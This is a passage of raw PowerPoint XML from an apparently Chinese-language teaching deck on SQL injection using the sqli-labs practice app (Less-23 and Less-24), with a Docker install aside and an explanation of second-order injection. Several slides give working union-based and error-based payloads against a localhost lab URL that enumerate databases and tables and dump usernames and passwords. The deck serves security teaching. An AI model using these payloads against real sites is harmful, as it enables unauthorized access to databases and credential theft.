              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者是任意一个超出数据库中的数据均可：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> select * from users where id=1 union select 1,2,3; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这个语句可以查询到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1,2,3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> select * from users where id=-1 union select 1,2,3; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这个语句只能查询到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1,2,3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，我们也可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的位置上使用一个较大的数字都是可以的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Less-23/?id=111‘ union select 1,2,database()’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询当前的数据库</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可查询所有的库信息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=0x7365637572697479)’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 查询所有的表信息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=0x7573657273)’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询所有的列信息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concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(0x7e,username,password)) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一次性查询所有的字段值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40012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_01</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a:t>docker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可参考链接：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.jianshu.com/p/76d41b3a078e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>以阿里云主机为例 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>阿里云主机的一个好处就是不需要修改源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，我的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ubuntu16.04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> –r      docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>最低要求内核为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>最低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>然后执行更新命令      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>apt-get update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>      3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker                apt-get install docker.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>      4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1380542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2147455"/>
            <a:ext cx="11762509" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时我们考虑使用第二种方法：报错注入</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(1,concat(0x7e,(database())),1) or ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报错出数据库</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(1,concat(0x7e,(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> limit 2,1)),1) or ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询所有的数据库，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行逐个查询。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1916419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19"/>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5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>思考：在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中我们使用：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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可以执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 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执行失败</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修正：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>闭合问题：执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以发现：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时如何我们不想使用括号的时候如何处理？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> where ‘a’=‘a  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这样就可以了，原因就是闭合的问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中执行可以看下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> select * from users where ‘a’=‘a’;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这样可以查询到所有的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> select * from users ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其实就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select * from users where true;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14852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A4C6-ECFE-4F24-A3A9-66DA8300EDCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859315" y="249382"/>
            <a:ext cx="10131425" cy="303747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>二次注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75F79B5-9CA0-4140-8BC0-0EDA6562C0DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401782" y="900545"/>
            <a:ext cx="11485417" cy="5708073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>参考资料： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.cnblogs.com/cute-puli/p/11145758.html</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https://www.jianshu.com/p/3fe7904683ac</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>二次注入可以理解为，攻击者构造的恶意数据存储在数据库后，恶意数据被读取并进入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理，但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中，当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>程序调用存储在数据库中的恶意数据并执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查询时，就发生了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>二次注入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>二次注入，可以概括为以下两步</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>第一步：插入恶意数据</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行数据库插入数据时，对其中的特殊字符进行了转义处理，在写入数据库的时候又保留了原来的数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>第二步：引用恶意数据</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>开发者默认存入数据库的数据都是安全的，在进行查询时，直接从数据库中取出恶意数据，没有进行进一步的检验的处理。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>例： 输入参数 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1‘  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>传输转义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>id= 1\’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>此时转义之后无法注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>存入数据库为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>1’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>再次取出直接闭合</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3664268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8" y="299512"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-24_01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2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下解压的时候可能会遇到文件名相同的问题，导致我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关的代码不完整。从而出现重命名。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们将文件在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>notepad++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中打开，搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>logined-in.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将文件名称进行替换即可！ 注意不可将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Logined-in.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行替换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DF6BC932-4AC3-4976-916F-7AE6B667BDCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="499346" y="2651534"/>
            <a:ext cx="3409545" cy="3571262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1830940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24A8A-0228-42C6-82ED-9F7FDD1671C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060575" y="305853"/>
            <a:ext cx="10131425" cy="442292"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-24_02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
